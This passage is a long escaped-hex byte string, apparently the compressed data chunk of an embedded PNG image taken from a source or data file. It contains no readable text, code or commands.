4\\x41\\x54\\x78\\xda\\\n\\xed\\xdd\\x7b\\x74\\x54\\xd5\\xd9\\x06\\xf0\\x67\\xcf\\x24\\x61\\x02\\x89\\x9a\\\n\\xb0\\xb8\\xa4\\x84\\x99\\x33\\x99\\xa0\\x88\\x5c\\x52\\x42\\x23\\x8d\\x94\\x82\\\n\\x5a\\x14\\xab\\x8d\\x04\\x0
2\\x28\\x44\\x2e\\x85\\x80\\x88\\x51\\x31\\x50\\x25\\\n\\x48\\x55\\x2e\\xb5\\xf2\\x7d\\x6b\\x41\\x24\\x42\\x10\\x29\\x96\\x04\\x96\\x0d\\\n\\x26\\x1f\\x94\\xf0\\xa9\\x0d\\x16\\x2c\\xa6\\xe1\\x12\\x8c\\x8b\\x94\\xaa\\x24\\\n\\x33\\x93\\x09\\xa2\\xa8\\x90\\xa4\\x2b\\xb4\\x98\\x61\\x66\\xf7\\x8f\\x10\\xda\\\n\\xba\\x56\\x65\\x80\\xc9\\xec\\x9c\\x9c\\xe7\\xf7\\x1f\\xcc\\x64\\x9f\\xf7\\x3d\\\n\\x39\\xe7\\x61\\xcf\\x9e\\x73\\x38\\x00\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\\n\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\\n\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x75\\x36\\x42\\x75\\x01\\x14\\x0a\\x42\\x24\\\n\\x0e\\xb6\\x6e\\xb6\\xcf\\x99\\x36\\x4d\\x2e\\x16\\x37\\xfa\\xef\\xc9\\xca\\x92\\\n\\x7e\\x7c\\x28\\x4e\\x0e\\x1f\\x7e\\xf9\\x2d\\x4e\\x69\\x91\\x69\\x55\\x55\\x28\\\n\\x12\\x95\\x58\\x5c\\x50\\xe0\\x74\\xd6\\xef\\xad\\xdf\\xbb\\x63\\x47\\xdb\\x8b\\\n\\x52\\xaa\\xee\\x80\\x3a\\x06\\x03\\xa0\\x4b\\x33\\x9b\\x1d\\x51\\xd6\\xa5\\x1a\\\n\\x8a\\x8a\\xd0\\x47\\x14\\x41\\x9b\\x32\\x25\\xe0\\x1f\\xcd\\x90\\xef\\xe0\\xae\\\n\\x1d\\x3b\\xea\\x5e\\xf2\\x0c\\x74\\xbf\\x9e\\x99\\xd9\\xf6\\x97\\x3e\\x9f\\xea\\\n\\x8e\\x28\\xb8\\xcc\\xaa\\x0b\\xa0\\x8e\\x91\\x70\\xb7\\x75\\x94\\x36\\x66\\xf9\\\n\\x72\\xe1\\x15\\x07\\x81\\x85\\x0b\\xaf\\x7a\\x80\\x13\\xa2\\x10\\xae\\x21\\x43\\\n\\x62\\x2d\\x37\\x9e\\x89\\xb9\\xe0\\xf5\\x36\\xb6\\x34\\xaf\\x6c\\xba\\xf8\\xfe\\\n\\xfb\\xaa\\xfb\\xa2\\xe0\\x32\\xa9\\x2e\\x80\\x82\\x2b\\x7e\\x51\\xfc\\xa2\\xf8\\\n\\x45\\x91\\x91\\x78\\x5e\\xcc\\x90\\xd3\\x72\\x72\\xae\\x77\\x3c\\x59\\x8d\\x32\\\n\\xff\\x9e\\x25\\x4b\\x34\\x68\\xd0\\x60\\xb1\\xa8\\xee\\x8f\\x82\\x8b\\x1f\\x01\\\n\\xba\\x98\\x01\\xb7\\xda\\x2d\\x76\\xcb\\xe8\\xd1\\xfe\\x56\\x7f\\x1f\\xd9\\xf7\\\n\\xc0\\x81\\x60\\x8d\\xeb\\x7f\\xd2\\x3f\\x56\\x3c\\x3d\\x7a\\xb4\\xeb\\xf1\\x86\\\n\\xad\\xae\\xc7\\xff\\xf4\\x27\\xd5\\x7d\\x52\\x70\\x70\\x06\\xd0\\xc5\\x5c\\x3c\\\n\\xe8\\xab\\xf6\\x55\\xf7\\xea\\x15\\xf4\\x81\\x1f\\x16\\xcf\\xf8\\x7e\\xd2\\xbb\\\n\\xb7\\xea\\xfe\\x28\\xb8\\x18\\x00\\x5d\\x8c\\xf9\\x76\\x8c\\x33\\x8f\\x37\\x05\\\n\\xfd\\xf7\\xda\\x51\\xe3\\x92\\x5a\\xfc\\x85\\x12\\x19\\x18\\x03\\x80\\xc8\\xc0\\\n\\x18\\x00\\x44\\x06\\xc6\\x00\\x20\\x32\\x30\\x06\\x00\\x91\\x81\\x31\\x00\\x88\\\n\\x0c\\x8c\\x01\\x40\\x64\\x60\\x0c\\x00\\x22\\x03\\x63\\x00\\x10\\x19\\x18\\x03\\\n\\x80\\xc8\\xc0\\x18\\x00\\x44\\x06\\xc6\\x00\\x20\\x32\\x30\\x06\\x00\\x91\\x81\\\n\\x31\\x00\\x88\\x0c\\x8c\\x01\\x40\\x64\\x60\\x0c\\x00\\x22\\x03\\x63\\x00\\x10\\\n\\x19\\x18\\x03\\x80\\xc8\\xc0\\x18\\x00\\x44\\x06\\xc6\\x00\\x20\\x32\\x30\\x06\\\n\\x00\\x91\\x81\\x31\\x00\\x88\\x0c\\x8c\\x01\\x40\\x64\\x60\\x0c\\x00\\x22\\x03\\\n\\x63\\x00\\x10\\x19\\x18\\x03\\x80\\xc8\\xc0\\x18\\x00\\x44\\x06\\xc6\\x00\\x20\\\n\\x32\\x30\\x06\\x00\\x91\\x81\\x31\\x00\\x88\\x0c\\x2c\\x4c\\x75\\x01\\x44\\xff\\\n\\x6e\\x0c\\x00\\x20\\x2c\\xcc\\x33\\xc5\\x36\\xd2\\x36\\xf2\\x67\\x3f\\x43\\x84\\\n\\x2c\\x13\\x8f\\xdf\\x75\\x97\\xe8\\x87\\xaf\\xf0\\x5e\\x4c\\x8c\\x7c\\x4a\\x24\\\n\\x21\\xdf\\xe9\\x34\\x2f\\x14\\x17\\x60\\xd9\\xb9\\xf3\\x64\\xb1\\x1b\\x6e\\x54\\\n\\x57\\xab\\xae\\x5b\\xaf\\x18\\x00\\xd7\\x29\\x61\\x49\\xff\\x97\\x13\\x96\\x8c\\\n\\x18\\x61\\x5a\\x27\\xaa\\xfc\\x7f\\x9e\\x38\\xd1\\x5f\\x2d\\x9e\\x91\\x79\\x09\\\n\\x09\\xe2\\x7e\\x78\\xe1\\x6d\\x6a\\x12\\x42\\x4e\\x32\\x4d\\x29\\x2f\\x8f\\xaf\\\n\\xf5\\x78\\x5c\\xae\\xd2\\xd2\\xfd\\x00\\x80\\x8b\\x17\\x55\\xd7\\xdd\\xd9\\x24\\\n\\xe6\\x59\\x97\\x5a\\x97\\x0e\\x1a\\xe4\\xb9\\x11\\x4f\\x99\\xde\\x2a\\x2a\\x12\\\n\\x2f\\x62\\x04\\xbe\\x48\\x4a\\x02\\xc4\\x70\\xe4\\xfe\
\xeb\\x7d\\xa2\\x18\\x7d\\\n\\x30\\x10\\xf0\\x43\\x02\\x5a\\x6e\\xae\\xe3\\x11\\xeb\\x70\\xcd\\x5d\\x50\\xd0\\\n\\xff\\xb7\\x9e\\x52\\x37\\x16\\x2e\\xdc\\x0f\\x80\\xfb\\x37\\x70\\x0c\\x80\\xab\\\n\\x34\\xa8\\x78\\x50\\xf1\\xa0\\xe2\\x88\\x88\\x6f\\x5a\\x5b\\xac\\x7f\\xdf\\xb7\\\n\\x71\\x23\\x96\\x8b\\xc9\\xfe\\xdf\\xcd\\x9a\\x25\\xe3\\xdb\\x5e\\x17\\xf7\\xe3\\\n\\x41\\x31\\xe1\\x5f\\xef\\x97\\x52\\x08\\x89\\xac\\xac\\x86\\x87\\x6d\\xbb\\x6d\\\n\\xbb\\x8f\\x1f\\x77\\x3c\\x27\\x23\\x64\\xc4\\xcc\\x99\\x75\\xb7\\x7a\\xee\\xf5\\\n\\xdc\\x7b\\xec\\x98\\xea\\x7e\\x54\\x73\\x58\\xb4\\xc9\\xda\\xe4\\x19\\x33\\xfc\\\n\\xd1\\x12\\x88\\xca\\xcf\\x17\\x2f\\x62\\x04\\xbe\\xe9\\xd1\\x23\\xe0\\x01\\x3e\\\n\\x10\\xc7\\xa0\\xcd\\x9b\\xd7\\xf0\\x57\\xeb\\xdb\\xda\\x03\\x7e\\x3f\\x6e\\xf5\\\n\\xdc\\xeb\\x7e\\x65\\xc1\\x02\\xd5\\x7d\\xe9\\x05\\xd7\\x00\\xae\\xd2\\x85\\x23\\\n\\xe7\\x57\\xfc\\xfd\\x96\\x57\\x5f\\xc5\\x72\\x31\\x19\\x6f\\xcf\\x9a\\x15\\xf0\\\n\\x0f\\x1e\\xc2\\xe3\\x22\\x7b\\xc8\\x10\\xd9\\x0a\\x88\\x88\\xca\\x4a\\xc7\\x3f\\\n\\x6c\\xe5\\xb6\\xf2\\x67\\x9f\\x6d\\x7b\\xd1\\x6c\\x56\\xdd\\x57\\xa8\\xc4\\x6d\\\n\\x8a\\xdb\\x14\\xb7\\xa9\\x7b\\x77\\x47\\x91\\xf5\\x90\\x36\\x7f\\xcb\\x16\\xf4\\\n\\x93\\x87\\x70\\x78\\xeb\\x56\\xb1\\x12\\x45\\xd8\\x74\\x15\\x27\\xfe\\xb7\\x3d\\\n\\x21\\x56\\xe3\\xf8\\xfc\\xf9\\x5a\\x89\\x56\\xa2\\x95\\x0c\\x1b\\xa6\\xba\\x4f\\\n\\xbd\\x60\\x00\\x04\\xc8\\xe1\\xb0\\x5a\\xad\\xd6\\xe4\\x64\\x51\\x8d\\x9b\\x90\\\n\\x3d\\x7b\\xf6\\xb5\\x8e\\x23\\xd2\\xc5\\x3c\\x31\\x3b\\x3c\\x1c\\x83\\xf1\\x73\\\n\\x31\\x67\\xf5\\x6a\\xc7\\xdd\\xb6\\x87\\xb4\\x1d\\x07\\x0e\\xdc\\x7c\\xd8\\x66\\\n\\xb1\\x59\\xec\\x76\\xd5\\x7d\\x76\\x14\\x0d\\x1a\\x34\\x0c\\x1c\\xd8\\x3d\\x3f\\\n\\xa2\\x39\\xa2\\xf9\\xd0\\xa1\\xab\\x0e\\xd0\\x2b\\xa9\\x43\\x3d\\xdc\\x42\\x98\\\n\\x0f\\xca\\x1a\\x59\\x33\\x71\\xa2\\xea\\x7e\\xf5\\x82\\x01\\x10\\x20\\x71\\x0a\\\n\\x3f\\x34\\xd9\\x26\\x4d\\x6a\\x3f\\xd0\\x82\\x36\\xb0\\x0b\\x15\\x78\\xf6\\x8e\\\n\\x3b\\x2e\\xda\\x64\\x11\\xf6\\x7c\\xf4\\x51\\x42\\x9a\\xad\\xd8\\x56\\x1c\\xc4\\\n\\x13\\x43\\xb1\\xc4\\xc1\\xd6\\xcd\\xf6\\x39\\xd3\\xa7\\x9b\\x0e\\xca\\xd7\\xe4\\\n\\x6b\\x47\\x8e\\xa0\\x05\\xeb\\x45\\xfe\\xe0\\xc1\\x1d\\xb5\\x3d\\x99\\x8e\\x38\\\n\\xc4\\x69\\x9a\\xea\\xbe\\xf5\\x82\\x6b\\x00\\x01\\x92\\x77\\x20\\x1d\\x2d\\x9a\\\n\\x86\\x7a\\x54\\x76\\xc4\\xf8\\x22\\x55\\x2c\\x12\\x73\\xa2\\xa3\\xdb\\xfe\\xb4\\\n\\x65\\x8b\\x23\\xcd\\xfa\\x99\\xf6\\xc8\\x03\\x0f\\x98\\xfb\\x78\\xcb\\x22\\x2c\\\n\\x59\\x59\\x9f\\x6e\\xfa\\x3c\\xeb\\xd3\\x4d\\x5f\\x7f\\xad\\x7a\\x3f\\x5c\\x49\\\n\\xfc\\xa2\\xf8\\x45\\xf1\\x8b\\x22\\x23\\x23\\x7e\\x64\\x6e\\x34\\x37\\xe6\\xe5\\\n\\xc9\\x1c\\xac\\x90\\xe5\\x73\\xe6\\x88\\x19\\x80\\x28\\xef\\xf8\\xed\\x8b\\x07\\\n\\x70\\x1e\\xe7\\x9b\\x9a\\x54\\xef\\x07\\xbd\\xe0\\x0c\\x20\\x40\\xb2\\x1f\\xee\\\n\\x46\\xce\\xb9\\x73\\x21\\xdb\\x60\\x8d\\x48\\xc5\\xfb\\x13\\x26\\xf8\\x6e\\x8a\\\n\\xc8\\x6e\\xdd\\x77\\xfc\\xb8\\x23\\xc6\\xb6\\xd6\\xb6\\x76\\xfc\\x78\\xd5\\xfb\\\n\\xe1\\xbf\\xb1\\x97\\xda\\x4b\\xed\\xa5\\x37\\xdf\\xdc\\xad\\xa7\\x69\\x88\\x79\\\n\\x5e\\x65\\xa5\\xc8\\xc1\\x7b\\xe2\\x8f\\x73\\xe6\\x84\\xba\\x0e\\x11\\xe9\\x6f\\\n\\x15\\x77\\x96\\x87\\x20\\x6a\\xba\\x06\\x06\\x40\\xa0\\x5a\\xc5\\x4f\\xe5\\x2b\\\n\\xfb\\xf6\\x85\\x7c\\xbb\\x6f\\xa1\\x0f\\x7c\\x7d\\xfb\\xe2\\x07\\x28\\x11\\xff\\\n\\x57\\x56\\x96\\x90\\x69\\x3d\\xab\\x15\\xe5\\xe7\\xb7\\x2f\\xa6\\xa9\\xde\\x2d\\\n\\x09\\x2b\\x6d\\x85\\xb6\\xc2\\x87\\x1e\\x12\\xa9\\x3e\\xbf\\x3f\\xfa\\xe8\\x51\\\n\\x6c\\x11\\xcf\\x8b\\x7b\\x86\\x0e\\x0d\\x75\\x1d\\xb2\\x06\\x71\\x98\\x7a\\xec\\\
n\\x58\\xed\\xe9\\x86\\x25\\xee\\xa1\\x65\\x65\\xaa\\xf7\\x8b\\x5e\\x30\\x00\\x02\\\n\\xe4\\x7c\\xb3\\xbe\\xb2\\xbe\\x72\\xd7\\x2e\\xf9\\x26\\xfe\\x86\\x61\\x1f\\x7e\\\n\\x18\\xf2\\x02\\x2e\\xad\\x3d\\x88\\x0a\\x31\\x1c\\xb9\\x0b\\x16\\x74\\x6f\\x09\\\n\\x4f\\xe9\\x96\\x75\\xec\\x58\\xfb\\x75\\x08\\xa1\\x2a\\xa3\\x6d\\x31\\xcf\\x62\\\n\\x71\\x6c\\xb2\\xae\\xd4\\x52\\x36\\x6c\\x10\\xbf\\x41\\xae\\x58\\xb6\\x7d\\xfb\\\n\\x7f\\x7e\\x84\\x09\\x1d\\xf9\\x3a\\x06\\x22\\xcd\\xe9\\xf4\\x47\\x8a\\x4a\\xbc\\\n\\xd4\\xbe\\xf8\\xe7\\xf3\\x85\\xba\\x0e\\xbd\\x62\\x00\\x5c\\x15\\x9f\\xcf\\x3f\\\n\\x42\\x34\\x62\\x57\\x7a\\x3a\\xfa\\xca\\x47\\x65\\xfe\\xc9\\x93\\xca\\x4a\\xc9\\\n\\x17\\x69\\xd0\\x6e\\xb9\\x05\\xd3\\xc4\\x50\\xdf\\xbd\\x15\\x15\\x8e\\x38\\xeb\\\n\\x05\\xbb\\x65\\xd9\\x32\\xf1\\x96\\xfc\\x46\\xba\\x82\\xff\\xb5\\xa2\\xec\\x83\\\n\\x05\\x72\\x7f\\xdf\\xbe\\xa6\\xa3\\x32\\x06\\x69\\x15\\x15\\xf8\\xb5\\x78\\x0d\\\n\\x5f\\xce\\x9f\\xaf\\xac\\xff\\xc7\\x70\\x1b\\x5e\\x2d\\x2b\\x8b\\xd8\\xe9\\x2d\\\n\\x6e\\x5d\\x91\\x92\\xe2\\x86\\x1b\\x6e\\xb8\\xdd\\xca\\xea\\xd1\\xa9\\xe0\\xad\\\n\\x66\\x1b\\x4c\\x62\\x5e\\x62\\x5e\\x62\\xde\\x0d\\x37\\xf8\\x87\\x7b\\x23\\xbd\\\n\\x91\\xeb\\xd7\\x8b\\x19\\x58\\x29\\x56\\x65\\x66\\xaa\\xae\\x4b\\x8e\\x92\\xbb\\\n\\xe0\\xfe\\xe4\\x13\\x71\\xf0\\x52\\x40\\x04\\x4b\\x29\\x96\\xe1\\xa5\\x96\\x16\\\n\\x4c\\xc0\\x4a\\x3c\\x13\\x15\\x15\\xf2\\xbe\\x5e\\xc6\\x2f\\xe5\\xf2\\x8b\\x17\\\n\\x4d\\x13\\xc5\\x6c\\x31\\x7b\\xd5\\xaa\\x5a\\xb8\\xe1\\xc6\\x8b\\x2f\\xb6\\xbd\\\n\\xea\\xf7\\x87\\xba\\x9e\\xae\\x82\\x01\\x10\\x24\\x89\\x89\\x56\\xab\\xdd\\x9e\\\n\\x91\\x21\\xa7\\x89\\x9e\\x32\\xb1\\xa0\\x00\\x85\\x38\\x87\\x93\\x31\\x31\\xaa\\\n\\xeb\\xd2\\x3b\\x79\\x1c\\x8b\\x65\\xce\\xa9\\x53\\xd8\\x2f\\x8f\\xc8\\x23\\x53\\\n\\xa7\\x3a\\xef\\xf3\\xbc\\xe1\\x79\\xe3\\x83\\x0f\\x54\\xd7\\xd5\\x55\\xf0\\x23\\\n\\x40\\x90\\xd4\\xd6\\x7a\\x3c\\x2e\\x57\\x71\\xb1\\xdc\\x66\\x6e\\x36\\xd5\\x25\\\n\\x25\\xc9\\x97\\xe4\\xff\\xc0\\x7d\\xe0\\x80\\xea\\xba\\x74\\x6b\\x31\\x32\\xe5\\\n\\xf4\\xf2\\x72\\x99\\x6d\\xaa\\x36\\x55\\x8f\\x18\\xc1\\x13\\xbf\\x63\\x70\\x06\\\n\\xd0\\xa1\\x84\\x48\\xd8\\xd8\\xdf\\xab\\xdd\\x97\\x9d\\x8d\\x4c\\x51\\x27\\xf3\\\n\\x5f\\x7e\\x59\\x0c\\x15\\xf7\\x88\\xb1\\x11\\x11\\xaa\\x2b\\xeb\\x6c\\x38\\xc5\\\n\\x57\\x83\\x01\\x10\\x22\\xed\\x97\\x12\\x23\\x1f\\x7f\\x35\\x59\\x0a\\x0b\\xf1\\\n\\x98\\x18\\x84\\xd6\\x81\\x03\\x55\\xd7\\xa5\\x5c\\xab\\x5c\\x22\\x37\\x34\\x34\\\n\\x60\\x38\\x1e\\x94\\x43\\xa7\\x4e\\xad\\xdb\\xe5\\xe9\\xe7\\xe9\\x57\\x51\\xa1\\\n\\xba\\x2c\\xa3\\x30\\xcc\\x4d\\x28\\xaa\\x35\\x36\\x36\\x37\\x37\\x37\\x7f\\xfe\\\n\\x79\\x8f\\xde\\xd1\\x17\\xa2\\x66\\x6c\\xd9\\x12\\x16\\x6e\\xfa\\xa5\\x58\\x1e\\\n\\x1d\\x8d\\x68\\x1c\\x11\\x55\\x29\\x29\\x68\\x44\\x33\\x9a\\x82\\x78\\x89\\x71\\\n\\x67\\x77\\x69\\x8a\\xef\\xef\\x6e\\xae\\x35\\x1d\\x19\\x3f\\xde\\xb9\\xa3\\x7e\\\n\\x7a\\xfd\\xf4\\x8f\\x3f\\x56\\x5d\\x96\\xd1\\x18\\xe7\\x80\\xeb\\xa4\\x12\\xf3\\\n\\xb4\\x2f\\xb5\\x2f\\xc7\\x8d\\x93\\x51\\x72\\x0c\\x32\\xb7\\x6e\\xc5\\x2a\\x9c\\\n\\xc7\\x27\\x71\\x71\\xaa\\xeb\\x0a\\x36\\x4e\\xf1\\x3b\\x27\\x2e\\x02\\x2a\\x56\\\n\\x9b\\xed\\xee\\xed\\xee\\xfd\\xee\\xbb\\xa2\\x25\\x7c\\x7e\\xd8\\x4f\\x87\\x0d\\\n\\x93\\xaf\\xe0\\xf7\\x72\\xf7\\xee\\xdd\\xaa\\xeb\\x0a\\x96\\xcb\\xab\\xf8\\x91\\\n\\xf2\\x80\\x3c\\x30\\x66\\x4c\\xdb\\x89\\xff\\xfc\\xf3\\x6d\\xaf\\xf2\\xc4\\x57\\\n\\x8d\\x33\\x80\\x4e\\xca\\x31\\xaf\\xff\\x79\\xad\\xe4\\x91\\x47\\x64\\xa6\\x69\\\n\\xbb\\x3c\\x9b\\x9f\\xdf\\x76\\x9d\\x41\\xe8\\xbf\\x7f\\xbf\\x66\\xed\\x53\\xfc\\\n\\xa3\\xa6\\x2f\\x4c\\x5f\
\x4c\\x9f\\xee\\xda\\xec\\xda\\xec\\xda\\x7c\\xe6\\x8c\\\n\\xea\\xb2\\xe8\\x3f\\x31\\x00\\x3a\\xb9\\x01\\xdb\\xad\\x56\\xab\\x35\\x21\\xc1\\\n\\xff\\xa4\\x88\\x35\\xcd\\xd8\\xb6\\x0d\\xd1\\x68\\xc4\\xb6\\xd4\\x54\\xd5\\x75\\\n\\x7d\\x1b\\xa7\\xf8\\xfa\\xc4\\x8f\\x00\\x9d\\xdc\\xc9\\x87\\x3d\\x1e\\x8f\\xc7\\\n\\xe9\\xec\\xff\\x65\\x7d\\xb5\\x7b\\xc5\\x8f\\x7f\\x2c\\xea\\x44\\x3d\\xdc\\x2f\\\n\\xbc\\x80\\xc7\\x30\\x03\\xb3\\xd5\\x5f\\xf3\\xce\\x29\\xbe\\xbe\\x71\\x06\\xa0\\\n\\x53\\x89\\x79\\x1a\\x34\\x8c\\x1c\\xe9\\x9f\\x22\\x1f\\x43\\x7e\\x61\\xa1\\x48\\\n\\xc5\\x1e\\xac\\x71\\x38\\x42\\x56\\x00\\xa7\\xf8\\x5d\\x02\\x03\\x40\\xe7\\xda\\\n\\xef\\x49\\x90\\xeb\\xbc\\x23\\xbd\\x23\\xd7\\xac\\x01\\x90\\x21\\x26\\x67\\x65\\\n\\x05\\x7b\\x3b\\x9c\\xe2\\x77\\x4d\\x0c\\x80\\x2e\\x26\\x31\\xcf\\xba\\xd4\\xbe\\\n\\x7a\\xd2\\x24\\xd9\\x53\\x7c\\x22\\x3d\\x05\\x05\\x58\\x8e\\xa3\\x78\\x3b\\x36\\\n\\xf6\\x5a\\xc7\\xe3\\xb5\\xf8\\x5d\\x1b\\x03\\xa0\\x8b\\x72\\xa4\\x39\\xd2\\x1c\\\n\\x69\\xfd\\xfb\\xe3\\x1d\\x6f\\x89\\xaf\\xdb\\x1b\\x6f\\xa0\\x9f\\x48\\xc0\\xe1\\\n\\xb1\\x63\\x03\\x1e\\x60\\x0b\\xa6\\xca\\x29\\x7b\\xf6\\x84\\x17\\x7b\\x73\\xbd\\\n\\xb9\\x33\\x67\\x7e\\xbc\\xfe\\xf4\\x0d\\xa7\\x6f\\x38\\x7b\\x56\\x75\\x5f\\x14\\\n\\x5c\\x0c\\x00\\x43\\x30\\x99\\xda\\x66\\x06\\xe9\\xe9\\xfe\\x38\\x7c\\x5f\\x2e\\\n\\x5d\\xb8\\x10\\x3d\\xc4\\x61\\xac\\x19\\x3c\\x18\\x37\\x23\\x41\\x46\\x49\\x29\\\n\\xca\\xf1\\x19\\x3e\\xab\\xae\\xf6\\xf7\\x91\\x7f\\x31\\x25\\xaf\\x5b\\xe7\\x9a\\\n\\xe0\\x29\\x75\\x4d\\xd8\\xb3\\x47\\x75\\xe5\\x44\\x44\\x44\\x44\\x44\\x44\\x44\\\n\\x44\\x44\\x44\\x74\\x1d\\x74\\xff\\x2d\\xc0\\x80\\x0c\\x0d\\x1a\\x92\\x92\\x7c\\\n\\x0f\\xfa\\x8f\\xe2\\x9d\\x8c\\x0c\\xd1\\x5d\\x8c\\x42\\xad\\xa6\\xc9\\x01\\x98\\\n\\x20\\x0f\\x9e\\x3b\\x87\\x26\\xdc\\x89\\x3b\\xdf\\x7b\\xcf\\x39\\xaa\\x7e\\x6e\\\n\\xfd\\xdc\\xf6\\xbb\\xec\\xd4\\x5f\\x42\\x4b\\x9d\\x99\\xd9\\x9c\\x30\\xc5\\x36\\\n\\xd2\\x36\\x32\\x2d\\x0d\\xcf\\xc1\\x0e\\xfb\\xd8\\xb1\\xe2\\x24\\x4a\\xc5\\xa8\\\n\\xd8\\x58\\x99\\x0a\\xe0\\xe7\\x2e\\x97\\xff\\x03\\xb1\\x1d\\x7b\\x8b\\x8b\\xdd\\\n\\xe9\\xee\\x74\\x77\\xfa\\x47\\x1f\\xa9\\xae\\xf8\\x5a\\xe9\\x2e\\x00\\x92\\x93\\\n\\x93\\x93\\x93\\x93\\xc3\\xc3\\x9b\\x9a\\xbe\\xde\\xf0\\xf5\\x86\\xf5\\xeb\\xe1\\\n\\x40\\x8e\\x58\\x32\\x77\\xee\\x95\\x9e\\xd9\\x27\\x97\\xcb\\xa3\\xe8\\x56\\x5d\\\n\\x1d\\x76\\xab\\xe8\\x2f\\xeb\\xd3\\xd3\\x3f\\x4d\\xa9\\xbf\\x50\\x7f\\xc1\\xe5\\\n\\x52\\xdd\\x0f\\x75\\x0e\\x97\\x6f\\xba\\x72\\xe1\\x05\\xf1\\x87\\xd2\\xd2\\x2b\\\n\\x3e\\xe0\\xc4\\x01\\x1b\\x34\\x29\\xb1\\x4e\\x2e\\xc5\\x90\\x8d\\x1b\\x6f\\x9a\\\n\\xde\\x2b\\xb7\\x67\\xc5\\x13\\x4f\\x54\\x55\\x55\\x55\\x55\\x55\\x79\\xbd\\xaa\\\n\\xfb\\x09\\x94\\xee\\x02\\xc0\\xe1\\xb0\\x1d\\xb6\\x1d\\x2e\\x28\\xc0\\x35\\x5e\\\n\\xf2\\x2a\\x2b\\x70\\x3f\\x16\\xd7\\xd5\\xe1\\x87\\xe6\\xff\\x37\\xfd\\x6f\\x72\\\n\\xb2\\xd3\\xe9\\x74\\x3a\\x9d\\xcd\\xcd\\xaa\\xfb\\x22\\x35\\xac\\x56\\xab\\xd5\\\n\\x6a\\x8d\\x89\\x09\\x5b\\x2a\\xc2\\x4c\\x83\\xab\\xaa\\xc4\\x1a\\xf8\\x70\\xe2\\\n\\x1a\\x9e\\xd2\\xfc\\x0b\\x39\\x17\\xbd\\x37\\x6e\\xac\\xcb\\xf2\\x2c\\x73\\x1f\\\n\\x7e\\xf4\\x51\\xd5\\x7d\\x05\\x4a\\x37\\x77\\x03\\xb6\\x4f\\xf5\\x2f\\xff\\x8b\\\n\\x7f\\x8d\\xda\\x6f\\x9a\\x11\\x0f\\xfa\\x66\\xfa\\x66\\x3e\\xfd\\xb4\\xea\\xbe\\\n\\x48\\xad\\xb0\\x5f\\xa1\\xc4\\xf4\\x5a\\x4e\\xce\\x35\\x9f\\xf8\\xed\\x76\\x8a\\\n\\x77\\xd1\\x7d\\xde\\x3c\\xad\\x44\\x2b\\xd1\\x4a\\x86\\x0d\\x53\\xdd\\x57\\xa0\\\n\\x74\\x13\\x00\\xbe\\xf5\\xd2\\x82\\x0b\\x41\\x7c\\x3c\\xf7\\x38\\xf9\\xb4\\x28\\\n\\xcc\\xc8\\x50\\xdd\\x17\\xa9\\x25\\xce\\x20\\x0c\\x
f7\\xb4\\x3f\\x52\\xec\\x3a\\\n\\x5c\\x3a\\x2e\\xcd\\x07\\x65\\x8d\\xac\\x09\\xc2\\x78\\x21\\xa2\\x9b\\x00\\x10\\\n\\x15\\x00\\x5e\\xbf\\x8e\\x84\\xfe\\x16\\xf9\\x23\\x34\\xc8\\x77\\x12\\x12\\x54\\\n\\xf7\\x45\\x6a\\xc9\\x79\\xb0\\x48\\x57\\xf0\\x8e\\x2b\\x2c\\xc6\\x5e\\x31\\x4e\\\n\\x3f\\xc7\\x95\\x6e\\x02\\x40\\xb6\\x60\\xa3\\xec\\x11\\x1e\\x1e\\xac\\xf1\\xf8\\\n\\xff\\xf3\\x13\\x10\\xfc\\xe3\\x40\\x96\\x63\\xbe\\xfc\\x58\\x3f\\xc7\\x95\\x6e\\\n\\x02\\x80\\x88\\x82\\x8f\\x01\\x40\\x64\\x60\\x0c\\x00\\x22\\x03\\x63\\x00\\x10\\\n\\x19\\x58\\x98\\xea\\x02\\x54\\x73\\x38\\x6c\\x36\\x4d\\x93\\x52\\x75\\x1d\\x44\\\n\\x2a\\x70\\x06\\x40\\x64\\x60\\xfa\\x09\\x80\\xa3\\xa8\\x46\\xb5\\x81\\x1e\\x9e\\\n\\x49\\xfa\\xa4\\xb3\\xe3\\x54\\x37\\x01\\x20\\x76\\x60\\x3f\\xf6\\x7f\\xef\\x7b\\\n\\xaa\\xeb\\x20\\xfa\\x2e\\x7a\\x3b\\x4e\\x75\\x13\\x00\\xf0\\x62\\x26\\x66\\xf6\\\n\\xee\\xad\\xba\\x0c\\xa2\\xef\\xa4\\xb3\\xe3\\x54\\x3f\\x01\\xb0\\x4a\\x3e\\x21\\\n\\xf2\\xc3\\x0c\\xbf\\x68\\x49\\x9d\\x5c\\x09\\xf2\\xc4\\xbb\\x66\\xb3\\xea\\x32\\\n\\x02\\xa5\\x9f\\x00\\xa8\\x15\\x2b\\x64\\xe6\\xa9\\x53\\xaa\\xcb\\x20\\xfa\\x4e\\\n\\x31\\xf8\\xbd\\x5c\\xd3\\xd0\\xa0\\xba\\x8c\\x40\\xe9\\x26\\xa9\\x6e\\xfa\\x22\\\n\\xd6\\x1d\\xeb\\x6e\\x69\\x11\\x42\\x4a\\x80\\x77\\xf1\\x51\\xe7\\xe4\\x8f\\x36\\\n\\x45\\x99\\xa2\\x72\\x72\\x9a\\xf6\\x35\\xed\\x6b\\xda\\x77\\xe2\\x84\\xea\\x7a\\\n\\xae\\x44\\x37\\xab\\x95\\xed\\x12\\x53\\xad\\x49\\xda\\xa6\\x9a\\x1a\\x79\\x46\\\n\\x34\\x62\\xf5\\x6d\\xb7\\xa9\\xae\\x87\\x08\\x00\\xfc\\x27\\x64\\x0a\\x7e\\x5b\\\n\\x53\\xe3\\xea\\xe6\\x29\\x76\\x8f\\x1e\\x32\\x44\\x75\\x3d\\x81\\xd2\\xcf\\x47\\\n\\x80\\x4b\\x6e\\xfc\\xa6\\x97\\xb9\\x67\\x41\\x4a\\x8a\\xf8\\x4a\\x9e\\xc5\\xc4\\\n\\xce\\x9f\\xb0\\xd4\\xb5\\xb5\\x9f\\xf8\\xb1\\xa9\\xbd\\x9c\\x3d\\x9f\\xba\\xfd\\\n\\x76\\xd5\\xf5\\x5c\\x2d\\xdd\\xcd\\x00\\xbe\\xcd\\x6e\\xb7\\xdb\\xed\\xf6\\x8c\\\n\\x0c\\xd3\\x04\\xff\\x2c\\xff\\xac\\xec\\x6c\\x24\\xca\\xe7\\xc4\\xb6\\xf8\\x78\\\n\\x14\\x89\\xbd\\x72\\xad\\xd7\\x8b\\x93\\xc8\\x45\\xee\\x57